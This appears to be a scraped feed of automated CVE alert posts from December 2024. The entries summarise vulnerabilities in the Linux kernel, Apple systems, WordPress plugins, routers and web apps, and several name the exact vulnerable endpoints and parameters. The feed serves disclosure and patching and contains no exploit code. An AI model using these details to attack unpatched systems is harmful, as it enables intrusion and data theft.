| 2024-12-09 19:07:33 |
🚨 CVE-2021-47052In the Linux kernel, the following vulnerability has been resolved:crypto: sa2ul - Fix memory leak of rxdThere are two error return paths that are not freeing rxd and causingmemory leaks. Fix these.Addresses-Coverity: ("Resource leak")🎖@cveNotify |
|
| 2024-12-09 19:07:28 |
🚨 CVE-2021-47050In the Linux kernel, the following vulnerability has been resolved:memory: renesas-rpc-if: fix possible NULL pointer dereference of resourceThe platform_get_resource_byname() can return NULL which would beimmediately dereferenced by resource_size(). Instead dereference itafter validating the resource.Addresses-Coverity: Dereference null return value🎖@cveNotify |
|
| 2024-12-09 19:07:27 |
🚨 CVE-2021-47046In the Linux kernel, the following vulnerability has been resolved:drm/amd/display: Fix off by one in hdmi_14_process_transaction()The hdcp_i2c_offsets[] array did not have an entry forHDCP_MESSAGE_ID_WRITE_CONTENT_STREAM_TYPE so it led to an off by oneread overflow. I added an entry and copied the 0x0 value for the offsetfrom similar code in drivers/gpu/drm/amd/display/modules/hdcp/hdcp_ddc.c.I also declared several of these arrays as having HDCP_MESSAGE_ID_MAXentries. This doesn't change the code, but it's just a belt andsuspenders approach to try future proof the code.🎖@cveNotify |
|
| 2024-12-09 18:38:05 |
🚨 CVE-2021-47002In the Linux kernel, the following vulnerability has been resolved:SUNRPC: Fix null pointer dereference in svc_rqst_free()When alloc_pages_node() returns null in svc_rqst_alloc(), thenull rq_scratch_page pointer will be dereferenced when callingput_page() in svc_rqst_free(). Fix it by adding a null check.Addresses-Coverity: ("Dereference after null check")🎖@cveNotify |
|
| 2024-12-09 18:37:59 |
🚨 CVE-2023-42853A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-09 18:37:58 |
🚨 CVE-2023-28649The Hub in the Snap One OvrC cloud platform is a device used to centralize and manage nested devices connected to it. A vulnerability exists in which an attacker could impersonate a hub and send device requests to claim already claimed devices. The OvrC cloud platform receives the requests but does not validate if the found devices are already managed by another user.🎖@cveNotify |
|
| 2024-12-09 18:37:57 |
🚨 CVE-2023-28386Snap One OvrC Pro devices versions 7.2 and prior do not validate firmware updates correctly. The device only calculates the MD5 hash of the firmware and does not check using a private-public key mechanism. The lack of complete PKI system firmware signature could allow attackers to upload arbitrary firmware updates, resulting in code execution.🎖@cveNotify |
|
| 2024-12-09 18:07:39 |
🚨 CVE-2023-52359Vulnerability of permission verification in some APIs in the ActivityTaskManagerService module.Impact: Successful exploitation of this vulnerability will affect availability.🎖@cveNotify |
|
| 2024-12-09 18:07:32 |
🚨 CVE-2021-47021In the Linux kernel, the following vulnerability has been resolved:mt76: mt7915: fix memleak when mt7915_unregister_device()mt7915_tx_token_put() should get call before mt76_free_pending_txwi().🎖@cveNotify |
|
| 2024-12-09 18:07:31 |
🚨 CVE-2021-47013In the Linux kernel, the following vulnerability has been resolved:net:emac/emac-mac: Fix a use after free in emac_mac_tx_buf_sendIn emac_mac_tx_buf_send, it calls emac_tx_fill_tpd(..,skb,..).If some error happens in emac_tx_fill_tpd(), the skb will be freed viadev_kfree_skb(skb) in error branch of emac_tx_fill_tpd().But the freed skb is still used via skb->len by netdev_sent_queue(,skb->len).As i observed that emac_tx_fill_tpd() haven't modified the value of skb->len,thus my patch assigns skb->len to 'len' before the possible free anduse 'len' instead of skb->len later.🎖@cveNotify |
|
| 2024-12-09 17:37:44 |
🚨 CVE-2024-45761Dell OpenManage Server Administrator, versions 11.0.1.0 and prior, contains an improper input validation vulnerability. A remote low-privileged malicious user could potentially exploit this vulnerability to load any web plugins or Java class leading to the possibility of altering the behavior of certain apps/OS or Denial of Service.🎖@cveNotify |
|
| 2024-12-09 17:37:38 |
🚨 CVE-2024-45760Dell OpenManage Server Administrator, versions 11.0.1.0 and prior, contains an improper access control vulnerability. A remote low privileged user could potentially exploit this vulnerability via the HTTP GET method leading to unauthorized action with elevated privileges.🎖@cveNotify |
|
| 2024-12-09 17:37:37 |
🚨 CVE-2024-11183The Simple Side Tab WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-12-09 17:37:36 |
🚨 CVE-2024-51164Multiple parameters have SQL injection vulnerability in JEPaaS 7.2.8 via /je/login/btnLog/insertBtnLog, which could allow a remote user to submit a specially crafted query, allowing an attacker to retrieve all the information stored in the DB.🎖@cveNotify |
|
| 2024-12-09 17:37:33 |
🚨 CVE-2023-42889The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1, macOS Monterey 12.7.1, macOS Ventura 13.6.1. An app may be able to bypass certain Privacy preferences.🎖@cveNotify |
|
| 2024-12-09 17:37:32 |
🚨 CVE-2023-42873The issue was addressed with improved bounds checks. This issue is fixed in macOS Sonoma 14.1, tvOS 17.1, macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1, macOS Ventura 13.6.1. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-12-09 17:37:31 |
🚨 CVE-2023-42843An inconsistent user interface issue was addressed with improved state management. This issue is fixed in iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1, Safari 17.1, macOS Sonoma 14.1. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2024-12-09 17:37:28 |
🚨 CVE-2023-52369Stack overflow vulnerability in the NFC module.Successful exploitation of this vulnerability may affect service availability and integrity.🎖@cveNotify |
|
| 2024-12-09 17:37:27 |
🚨 CVE-2023-52365Out-of-bounds read vulnerability in the smart activity recognition module.Successful exploitation of this vulnerability may cause features to perform abnormally.🎖@cveNotify |
|
| 2024-12-09 17:08:07 |
🚨 CVE-2023-42954A privilege escalation issue existed in FileMaker Server, potentially exposing sensitive information to front-end websites when signed in to the Admin Console with an administrator role. This issue has been fixed in FileMaker Server 20.3.1 by reducing the information sent in requests.🎖@cveNotify |
|
| 2024-12-09 17:08:06 |
🚨 CVE-2023-52363Vulnerability of defects introduced in the design process in the Control Panel module.Successful exploitation of this vulnerability may cause app processes to be started by mistake.🎖@cveNotify |
|
| 2024-12-09 17:08:03 |
🚨 CVE-2024-20923Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JavaFX). Supported versions that are affected are Oracle Java SE: 8u391; Oracle GraalVM Enterprise Edition: 20.3.12 and 21.3.8. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-12-09 17:08:02 |
🚨 CVE-2022-23085A user-provided integer option was passed to nmreq_copyin() without checking if it would overflow. This insufficient bounds checking could lead to kernel memory corruption.On systems configured to include netmap in their devfs_ruleset, a privileged process running in a jail can affect the host environment.🎖@cveNotify |
|
| 2024-12-09 17:08:01 |
🚨 CVE-2022-23084The total size of the user-provided nmreq to nmreq_copyin() was first computed and then trusted during the copyin. This time-of-check to time-of-use bug could lead to kernel memory corruption.On systems configured to include netmap in their devfs_ruleset, a privileged process running in a jail can affect the host environment.🎖@cveNotify |
|
| 2024-12-09 16:37:48 |
🚨 CVE-2024-40582Pentaminds CuroVMS v2.0.1 was discovered to contain exposed sensitive information.🎖@cveNotify |
|
| 2024-12-09 16:37:43 |
🚨 CVE-2024-55564The POSIX::2008 package before 0.24 for Perl has a potential _execve50c env buffer overflow.🎖@cveNotify |
|
| 2024-12-09 16:37:42 |
🚨 CVE-2024-33122Roothub v2.6 was discovered to contain a SQL injection vulnerability via the topic parameter in the list() function.🎖@cveNotify |
|
| 2024-12-09 16:37:37 |
🚨 CVE-2024-23295A permissions issue was addressed to help ensure Personas are always protected This issue is fixed in visionOS 1.1. An unauthenticated user may be able to use an unprotected Persona.🎖@cveNotify |
|
| 2024-12-09 16:37:36 |
🚨 CVE-2023-52361The VerifiedBoot module has a vulnerability that may cause authentication errors.Successful exploitation of this vulnerability may affect integrity.🎖@cveNotify |
|
| 2024-12-09 15:08:19 |
🚨 CVE-2024-23298A logic issue was addressed with improved state management.🎖@cveNotify |
|
| 2024-12-09 15:08:18 |
🚨 CVE-2024-0670Privilege escalation in windows agent plugin in Checkmk before 2.2.0p23, 2.1.0p40 and 2.0.0 (EOL) allows local user to escalate privileges🎖@cveNotify |
|
| 2024-12-09 15:08:13 |
🚨 CVE-2024-23291A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in tvOS 17.4, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A malicious app may be able to observe user data in log entries related to accessibility notifications.🎖@cveNotify |
|
| 2024-12-09 15:08:12 |
🚨 CVE-2024-23289A lock screen issue was addressed with improved state management. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4, macOS Sonoma 14.4, watchOS 10.4. A person with physical access to a device may be able to use Siri to access private calendar information.🎖@cveNotify |
|
| 2024-12-09 15:08:08 |
🚨 CVE-2024-23286A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, watchOS 10.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. Processing an image may lead to arbitrary code execution.🎖@cveNotify |
|
| 2024-12-09 15:08:07 |
🚨 CVE-2024-23283A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, macOS Monterey 12.7.4, macOS Sonoma 14.4, macOS Ventura 13.6.5. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-09 15:08:03 |
🚨 CVE-2024-23264A validation issue was addressed with improved input sanitization. This issue is fixed in macOS Monterey 12.7.4, macOS Ventura 13.6.5, macOS Sonoma 14.4, visionOS 1.1, iOS 17.4 and iPadOS 17.4, iOS 16.7.6 and iPadOS 16.7.6, tvOS 17.4. An application may be able to read restricted memory.🎖@cveNotify |
|
| 2024-12-09 15:08:02 |
🚨 CVE-2024-0011A reflected cross-site scripting (XSS) vulnerability in the Captive Portal feature of Palo Alto Networks PAN-OS software enables execution of malicious JavaScript (in the context of an authenticated Captive Portal user’s browser) if a user clicks on a malicious link, allowing phishing attacks that could lead to credential theft.🎖@cveNotify |
|
| 2024-12-09 14:37:38 |
🚨 CVE-2024-53814Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Analytify.This issue affects Analytify: from n/a through 5.4.3.🎖@cveNotify |
|
| 2024-12-09 13:38:02 |
🚨 CVE-2024-40965In the Linux kernel, the following vulnerability has been resolved:i2c: lpi2c: Avoid calling clk_get_rate during transferInstead of repeatedly calling clk_get_rate for each transfer, lockthe clock rate and cache the value.A deadlock has been observed while adding tlv320aic32x4 audio codec tothe system. When this clock provider adds its clock, the clk mutex islocked already, it needs to access i2c, which in return needs the mutexfor clk_get_rate as well.🎖@cveNotify |
|
| 2024-12-09 13:38:01 |
🚨 CVE-2024-26686In the Linux kernel, the following vulnerability has been resolved:fs/proc: do_task_stat: use sig->stats_lock to gather the threads/children statslock_task_sighand() can trigger a hard lockup. If NR_CPUS threads calldo_task_stat() at the same time and the process has NR_THREADS, it willspin with irqs disabled O(NR_CPUS * NR_THREADS) time.Change do_task_stat() to use sig->stats_lock to gather the statisticsoutside of ->siglock protected section, in the likely case this code willrun lockless.🎖@cveNotify |
|
| 2024-12-09 11:37:31 |
🚨 CVE-2023-52920In the Linux kernel, the following vulnerability has been resolved:bpf: support non-r10 register spill/fill to/from stack in precision trackingUse instruction (jump) history to record instructions that performedregister spill/fill to/from stack, regardless if this was done throughread-only r10 register, or any other register after copying r10 into it*and* potentially adjusting offset.To make this work reliably, we push extra per-instruction flags intoinstruction history, encoding stack slot index (spi) and stack framenumber in extra 10 bit flags we take away from prev_idx in instructionhistory. We don't touch idx field for maximum performance, as it'schecked most frequently during backtracking.This change removes basically the last remaining practical limitation ofprecision backtracking logic in BPF verifier. It fixes knowndeficiencies, but also opens up new opportunities to reduce number ofverified states, explored in the subsequent patches.There are only three differences in selftests' BPF object filesaccording to veristat, all in the positive direction (less states).File Program Insns (A) Insns (B) Insns (DIFF) States (A) States (B) States (DIFF)-------------------------------------- ------------- --------- --------- ------------- ---------- ---------- -------------test_cls_redirect_dynptr.bpf.linked3.o cls_redirect 2987 2864 -123 (-4.12%) 240 231 -9 (-3.75%)xdp_synproxy_kern.bpf.linked3.o syncookie_tc 82848 82661 -187 (-0.23%) 5107 5073 -34 (-0.67%)xdp_synproxy_kern.bpf.linked3.o syncookie_xdp 85116 84964 -152 (-0.18%) 5162 5130 -32 (-0.62%)Note, I avoided renaming jmp_history to more generic insn_hist tominimize number of lines changed and potential merge conflicts betweenbpf and bpf-next trees.Notice also cur_hist_entry pointer reset to NULL at the beginning ofinstruction verification loop. This pointer avoids the problem ofrelying on last jump history entry's insn_idx to determine whether wealready have entry for current instruction or not. It can happen that weadded jump history entry because current instruction is_jmp_point(), butalso we need to add instruction flags for stack access. In this case, wedon't want to entries, so we need to reuse last added entry, if it ispresent.Relying on insn_idx comparison has the same ambiguity problem as the onethat was fixed recently in [0], so we avoid that. [0] https://patchwork.kernel.org/project/netdevbpf/patch/20231110002638.4168352-3-andrii@kernel.org/🎖@cveNotify |
|
| 2024-12-09 10:38:03 |
🚨 CVE-2024-46901Insufficient validation of filenames against control characters in Apache Subversion repositories served via mod_dav_svn allows authenticated users with commit access to commit a corrupted revision, leading to disruption for users of the repository.All versions of Subversion up to and including Subversion 1.14.4 are affected if serving repositories via mod_dav_svn. Users are recommended to upgrade to version 1.14.5, which fixes this issue.Repositories served via other access methods are not affected.🎖@cveNotify |
|
| 2024-12-09 09:37:38 |
🚨 CVE-2024-12307A function-level access control vulnerability in Unifiedtransform version 2.0 and potentially earlier versions allows teachers to modify student personal data without proper authorization. The vulnerability exists due to missing access control checks in the student editing functionality. At the time of publication of the CVE no patch is available.🎖@cveNotify |
|
| 2024-12-09 09:37:37 |
🚨 CVE-2024-12305An object-level access control vulnerability in Unifiedtransform version 2.0 and potentially earlier versions allows unauthorized access to student grades. A malicious student user can view grades of other students by manipulating the student_id parameter in the marks viewing endpoint. The vulnerability exists due to insufficient access control checks in MarkController.php. At the time of publication of the CVE no patch is available.🎖@cveNotify |
|
| 2024-12-09 06:37:25 |
🚨 CVE-2024-9651The Fluent Forms WordPress plugin before 5.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-12-09 05:37:44 |
🚨 CVE-2024-12358A vulnerability was found in WeiYe-Jing datax-web 2.1.1. It has been classified as critical. This affects an unknown part of the file /api/job/add/. The manipulation of the argument glueSource leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-09 05:37:43 |
🚨 CVE-2023-34246Doorkeeper is an OAuth 2 provider for Ruby on Rails / Grape. Prior to version 5.6.6, Doorkeeper automatically processes authorization requests without user consent for public clients that have been previous approved. Public clients are inherently vulnerable to impersonation, their identity cannot be assured. This issue is fixed in version 5.6.6.🎖@cveNotify |
|
| 2024-12-09 04:37:48 |
🚨 CVE-2024-53285Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in DDNS Record functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-12-09 04:37:47 |
🚨 CVE-2024-53284Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in WiFi Connect Setting functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-12-09 04:37:44 |
🚨 CVE-2024-53283Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in Router Port Forward functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-12-09 04:37:43 |
🚨 CVE-2024-53280Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in network center policy route functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-12-09 04:37:42 |
🚨 CVE-2024-53279Improper neutralization of input during web page generation ('Cross-site Scripting') vulnerability in file station functionality in Synology Router Manager (SRM) before 1.3.1-9346-10 allows remote authenticated users with administrator privileges to inject arbitrary web script or HTML via unspecified vectors.🎖@cveNotify |
|
| 2024-12-09 03:37:40 |
🚨 CVE-2024-55582Oxide before 6 has unencrypted Control Plane datastores.🎖@cveNotify |
|
| 2024-12-09 03:37:39 |
🚨 CVE-2024-55578Zammad before 6.4.1 places sensitive data (such as auth_microsoft_office365_credentials and application_secret) in log files.🎖@cveNotify |
|
| 2024-12-09 02:38:02 |
🚨 CVE-2024-55565nanoid (aka Nano ID) before 5.0.9 mishandles non-integer values. 3.3.8 is also a fixed version.🎖@cveNotify |
|
| 2024-12-09 02:37:57 |
🚨 CVE-2024-12354A vulnerability, which was classified as critical, was found in SourceCodester Phone Contact Manager System 1.0. Affected is the function UserInterface::MenuDisplayStart of the component User Menu. The manipulation leads to buffer overflow. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-09 02:37:56 |
🚨 CVE-2024-12352A vulnerability classified as problematic was found in TOTOLINK EX1800T 9.1.0cu.2112_B20220316. This vulnerability affects the function sub_40662C of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-09 01:37:31 |
🚨 CVE-2024-12351A vulnerability classified as critical has been found in JFinalCMS 1.0. This affects the function findPage of the file src\main\java\com\cms\entity\ContentModel.java of the component File Content Handler. The manipulation of the argument name leads to sql injection. It is possible to initiate the attack remotely.🎖@cveNotify |
|
| 2024-12-09 01:37:30 |
🚨 CVE-2024-12348A vulnerability was found in Guizhou Xiaoma Technology jpress 5.1.2. It has been classified as problematic. Affected is the function AttachmentUtils.isUnSafe of the file /commons/attachment/upload of the component Attachment Upload Handler. The manipulation of the argument files[] leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-09 00:37:42 |
🚨 CVE-2024-12347A vulnerability was found in Guangzhou Huayi Intelligent Technology Jeewms up to 1.0.0 and classified as critical. This issue affects some unknown processing of the file /jeewms_war/webpage/system/druid/index.html of the component Druid Monitoring Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-12-09 00:37:41 |
🚨 CVE-2024-12346A vulnerability has been found in Talentera up to 20241128 and classified as problematic. This vulnerability affects unknown code of the file /app/control/byt_cv_manager. The manipulation of the argument redirect_url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The provided PoC only works in Mozilla Firefox. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-12-08 23:37:24 |
🚨 CVE-2024-12344A vulnerability, which was classified as critical, was found in TP-Link VN020 F3v(T) TT_V6.2.1021. This affects an unknown part of the component FTP USER Command Handler. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-08 10:37:24 |
🚨 CVE-2024-12343A vulnerability classified as critical has been found in TP-Link VN020 F3v(T) TT_V6.2.1021. Affected is an unknown function of the file /control/WANIPConnection of the component SOAP Request Handler. The manipulation of the argument NewConnectionType leads to buffer overflow. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-08 07:37:24 |
🚨 CVE-2024-12342A vulnerability was found in TP-Link VN020 F3v(T) TT_V6.2.1021. It has been rated as critical. This issue affects some unknown processing of the file /control/WANIPConnection of the component Incomplete SOAP Request Handler. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-08 06:37:24 |
🚨 CVE-2024-12209The WP Umbrella: Update Backup Restore & Monitoring plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.17.0 via the 'filename' parameter of the 'umbrella-restore' action. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-12-07 23:37:25 |
🚨 CVE-2024-53473WeGIA 3.2.0 before 3998672 does not verify permission to change a password.🎖@cveNotify |
|
| 2024-12-07 23:37:24 |
🚨 CVE-2024-54749Ubiquiti U7-Pro 7.0.35 was discovered to contain a hardcoded password vulnerability in /etc/shadow, which allows attackers to log in as root. NOTE: this is disputed by the Supplier because the observation only established that a password is present in a firmware image; however, the device cannot be deployed without setting a new password during installation.🎖@cveNotify |
|
| 2024-12-07 21:37:24 |
🚨 CVE-2020-35357A buffer overflow can occur when calculating the quantile value using the Statistics Library of GSL (GNU Scientific Library), versions 2.5 and 2.6. Processing a maliciously crafted input data for gsl_stats_quantile_from_sorted_data of the library may lead to unexpected application termination or arbitrary code execution.🎖@cveNotify |
|
| 2024-12-07 15:37:25 |
🚨 CVE-2024-47107IBM QRadar SIEM 7.5 is vulnerable to stored cross-site scripting. This vulnerability allows authenticated users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.🎖@cveNotify |
|
| 2024-12-07 14:37:25 |
🚨 CVE-2024-41762IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query.🎖@cveNotify |
|
| 2024-12-07 13:37:25 |
🚨 CVE-2024-47115IBM AIX 7.2, 7.3 and VIOS 3.1 and 4.1 could allow a local user to execute arbitrary commands on the system due to improper neutralization of input.🎖@cveNotify |
|
| 2024-12-07 13:37:24 |
🚨 CVE-2024-37071IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 10.5, 11.1, and 11.5 could allow an authenticated user to cause a denial of service with a specially crafted query due to improper memory allocation.🎖@cveNotify |
|
| 2024-12-07 12:37:25 |
🚨 CVE-2024-11457The Feedpress Generator – External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-07 12:37:24 |
🚨 CVE-2024-11380The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-07 10:37:32 |
🚨 CVE-2024-12270The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-12-07 10:37:25 |
🚨 CVE-2024-11367The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-07 10:37:24 |
🚨 CVE-2024-11010The FileOrganizer – Manage WordPress and Website Files plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.4 via the 'default_lang' parameter. This makes it possible for authenticated attackers, with Administrator-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.🎖@cveNotify |
|
| 2024-12-07 07:37:24 |
🚨 CVE-2024-53143In the Linux kernel, the following vulnerability has been resolved:fsnotify: Fix ordering of iput() and watched_objects decrementEnsure the superblock is kept alive until we're done with iput().Holding a reference to an inode is not allowed unless we ensure thesuperblock stays alive, which fsnotify does by keeping thewatched_objects count elevated, so iput() must happen before thewatched_objects decrement.This can lead to a UAF of something like sb->s_fs_info in tmpfs, but theUAF is hard to hit because race orderings that oops are more likely, thanksto the CHECK_DATA_CORRUPTION() block in generic_shutdown_super().Also, ensure that fsnotify_put_sb_watched_objects() doesn't callfsnotify_sb_watched_objects() on a superblock that may have already beenfreed, which would cause a UAF read of sb->s_fsnotify_info.🎖@cveNotify |
|
| 2024-12-07 06:37:24 |
🚨 CVE-2024-11183The Simple Side Tab WordPress plugin before 2.2.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-12-07 03:37:25 |
🚨 CVE-2024-23280An injection issue was addressed with improved validation. This issue is fixed in Safari 17.4, macOS Sonoma 14.4, iOS 17.4 and iPadOS 17.4, watchOS 10.4, tvOS 17.4. A maliciously crafted webpage may be able to fingerprint the user.🎖@cveNotify |
|
| 2024-12-07 03:07:48 |
🚨 CVE-2024-23279A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.4. An app may be able to access user-sensitive data.🎖@cveNotify |
|
| 2024-12-07 03:07:42 |
🚨 CVE-2024-1823A vulnerability classified as critical was found in CodeAstro Simple Voting System 1.0. Affected by this vulnerability is an unknown functionality of the file users.php of the component Backend. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-254611.🎖@cveNotify |
|
| 2024-12-07 03:07:41 |
🚨 CVE-2024-1818A vulnerability was found in CodeAstro Membership Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /uploads/ of the component Logo Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-254606 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-12-07 02:37:45 |
🚨 CVE-2024-12115The Poll Maker – Versus Polls, Anonymous Polls, Image Polls plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.5.4. This is due to missing or incorrect nonce validation on the duplicate_poll() function. This makes it possible for unauthenticated attackers to duplicate polls via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-07 02:37:39 |
🚨 CVE-2024-12026The Message Filter for Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the saveFilter() function in all versions up to, and including, 1.6.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to create new filters.🎖@cveNotify |
|
| 2024-12-07 02:37:38 |
🚨 CVE-2024-11451The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-07 02:37:37 |
🚨 CVE-2024-11436The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-07 02:37:33 |
🚨 CVE-2024-11329The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-07 02:37:32 |
🚨 CVE-2024-23269A downgrade issue affecting Intel-based Mac computers was addressed with additional code-signing restrictions. This issue is fixed in macOS Sonoma 14.4, macOS Monterey 12.7.4, macOS Ventura 13.6.5. An app may be able to modify protected parts of the file system.🎖@cveNotify |
|
| 2024-12-06 22:37:43 |
